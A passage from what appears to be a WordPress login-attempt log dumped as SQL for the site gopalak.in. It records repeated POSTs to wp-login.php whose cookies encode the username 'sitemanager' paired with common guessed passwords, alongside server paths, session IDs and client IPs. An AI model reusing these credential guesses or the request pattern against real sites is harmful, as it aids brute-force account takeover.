_wptn=c2l0ZW1hbmFnZXI7YWRtaW4xMjM%3D\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"61181\";s:11:\"REMOTE_ADDR\";s:13:\"146.59.227.21\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"82\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744975619.601377;s:12:\"REQUEST_TIME\";i:1744975619;}}','146.59.227.21',1,'2025-04-18 16:57:01','2025-04-18 17:07:01'),(93803,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52602\";s:11:\"REMOTE_ADDR\";s:13:\"81.177.140.54\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744975736.6075621;s:12:\"REQUEST_TIME\";i:1744975736;}}','81.177.140.54',0,'2025-04-18 16:58:58','1970-01-01 00:00:00'),(93804,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"80\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:286:\"_uid=rB8jg2gCNveisG9fA097Ag==; _jwp=1; PHPSESSID=5f29151191e00b0a25151102cb6d5d79; swpm_session=a9a0779edffaa59bb199b9f190f51914; wordpress_test_cookie=WP%20Cookie%20check; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=pdw3qz8FkzkXhjKO68xFMk9n5d8Ydp9A; _wptn=c2l0ZW1hbmFnZXI7YXplcnR5\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"61181\";s:11:\"REMOTE_ADDR\";s:13:\"146.59.227.21\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"80\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744976221.007206;s:12:\"REQUEST_TIME\";i:1744976221;}}','146.59.227.21',1,'2025-04-18 17:07:02','2025-04-18 17:17:10'),(93805,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"81\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:294:\"_uid=rB8jg2gCNveisG9fA097Ag==; _jwp=1; PHPSESSID=5f29151191e00b0a25151102cb6d5d79; swpm_session=a9a0779edffaa59bb199b9f190f51914; wordpress_test_cookie=WP%20Cookie%20check; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=pdw3qz8FkzkXhjKO68xFMk9n5d8Ydp9A; _wptn=c2l0ZW1hbmFnZXI7MTQ3ODk2Mw%3D%3D\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"61181\";s:11:\"REMOTE_ADDR\";s:13:\"146.59.227.21\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"81\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744976222.816716;s:12:\"REQUEST_TIME\";i:1744976222;}}','146.59.227.21',1,'2025-04-18 17:07:04','2025-04-18 17:17:10'),(93806,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"78\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:292:\"_uid=rB8jg2gCNveisG9fA097Ag==; _jwp=1; PHPSESSID=5f29151191e00b0a25151102cb6d5d79; swpm_session=a9a0779edffaa59bb199b9f190f51914; wordpress_test_cookie=WP%20Cookie%20check; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=pdw3qz8FkzkXhjKO68xFMk9n5d8Ydp9A; _wptn=c2l0ZW1hbmFnZXI7MTIzNDU2YWE%3D\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"61181\";s:11:\"REMOTE_ADDR\";s:13:\"146.59.227.21\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"78\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744976224.6723139;s:12:\"REQUEST_TIME\";i:1744976224;}}','146.59.227.21',1,'2025-04-18 17:07:06','2025-04-18 17:17:10'),(93807,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"81\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:288:\"_uid=rB8jg2gCNveisG9fA097Ag==; _jwp=1; PHPSESSID=5f29151191e00b0a25151102cb6d5d79; swpm_session=a9a0779edffaa59bb199b9f190f51914; wordpress_test_cookie=WP%20Cookie%20check; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=pdw3qz8FkzkXhjKO68xFMk9n5d8Ydp9A; _wptn=c2l0ZW1hbmFnZXI7dGlnZXI%3D\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"61181\";s:11:\"REMOTE_ADDR\";s:13:\"146.59.227.21\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"81\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744976226.4694841;s:12:\"REQUEST_TIME\";i:1744976226;}}','146.59.227.21',1,'2025-04-18 17:07:08','2025-04-18 17:17:10'),(93808,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"76\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:292:\"_uid=rB8jg2gCNveisG9fA097Ag==; _jwp=1; PHPSESSID=5f29151191e00b0a25151102cb6d5d79; swpm_session=a9a0779edffaa59bb199b9f190f51914; wordpress_test_cookie=WP%20Cookie%20check; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=pdw3qz8FkzkXhjKO68xFMk9n5d8Ydp9A; _wptn=c2l0ZW1hbmFnZXI7bW9oYW1tZWQ%3D\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"61181\";s:11:\"REMOTE_ADDR\";s:13:\"146.59.227.21\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"76\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744976228.32582;s:12:\"REQUEST_TIME\";i:1744976228;}}','146.59.227.21',1,'2025-04-18 17:07:09','2025-04-18 17:17:10'),(93809,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Edg/114.0.1823.67\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"48348\";s:11:\"REMOTE_ADDR\";s:11:\"142.93.15.2\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744976436.3168271;s:12:\"REQUEST_TIME\";i:1744976436;}}','142.93.15.2',0,'2025-04-18 17:10:37','1970-01-01 00:00:00'),(93810,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"82\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:290:\"_uid=rB8jg2gCNveisG9fA097Ag==; _jwp=1; PHPSESSID=5f29151191e00b0a25151102cb6d5d79; swpm_session=a9a0779edffaa59bb199b9f190f51914; wordpress_test_cookie=WP%20Cookie%20check; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=pdw3qz8FkzkXhjKO68xFMk9n5d8Ydp9A; _wptn=c2l0ZW1hbmFnZXI7Nzg5NDU2MTIz\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"61181\";s:11:\"REMOTE_ADDR\";s:13:\"146.59.227.21\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"82\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744976829.1518221;s:12:\"REQUEST_TIME\";i:1744976829;}}','146.59.227.21',1,'2025-04-18 17:17:10','2025-04-19 17:17:18'),(93811,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:37:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:30:\"http://gopalak.in/wp-login.php\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"79\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36\";s:11:\"HTTP_COOKIE\";s:290:\"_uid=rB8jg2gCNveisG9fA097Ag==; _jwp=1; PHPSESSID=5f29151191e00b0a25151102cb6d5d79; swpm_session=a9a0779edffaa59bb199b9f190f51914; wordpress_test_cookie=WP%20Cookie%20check; wp_wpfileupload_3b69a4c0d2d060222158af339a5f9adb=pdw3qz8FkzkXhjKO68xFMk9n5d8Ydp9A; _wptn=c2l0ZW1hbmFnZXI7a2lsbGVyMTIz\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"61181\";s:11:\"REMOTE_ADDR\";s:13:\"146.59.227.21\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"79\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1744976830.9833479;s:12:\"REQUEST_TIME\";i:1744976830;}}','146.59.227.21',1,'2025-04-18 17:17:12','2025-04-19 